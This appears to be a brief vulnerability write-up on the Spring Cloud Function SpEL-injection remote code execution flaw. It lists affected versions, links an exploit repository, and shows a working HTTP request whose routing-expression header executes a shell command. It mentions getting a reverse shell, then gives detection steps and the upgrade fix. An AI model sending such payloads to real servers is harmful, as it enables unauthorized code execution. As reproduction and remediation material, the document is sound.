Spring Cloud Function Vulnerability Overview
Spring Cloud Function is a function framework based on Spring Boot. Due to inadequate security handling of user input parameters in Spring Cloud Function, an unauthorized attacker can craft specific data packets and perform SpEL expression injection attacks through specific HTTP request headers, allowing the execution of arbitrary malicious Java code and gaining service permissions.
Affected Versions: Spring Cloud Function
- 3.0.0.RELEASE <= Spring Cloud Function <= 3.1.6
- Spring Cloud Function <= 3.2.2
Vulnerability Exploit
https://github.com/k3rwin/spring-cloud-function-rce
Vulnerability Environment Setup
Use vulhub for reproduction.
Vulnerability Reproduction
The SpEL expression contained in the spring.cloud.function.routing-expression header of the request will be executed.
POST /functionRouter HTTP/1.1
Host: vul.zgao.top:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("touch /tmp/success")
Content-Type: text/plain
Content-Length: 4
test
Command executed successfully.
Use the above exploit to perform a reverse shell.
Traceability Investigation
If the program is packaged using Maven, check the project’s pom.xml file for the inclusion of spring-cloud-function related components.
grep -C2 'spring-cloud-function-context' pom.xml
Here, docker logs are used for logging. Check for the keyword: functionRouter
Fix Method
Upgrade Spring Cloud Function to 3.1.7 or 3.2.3 and above.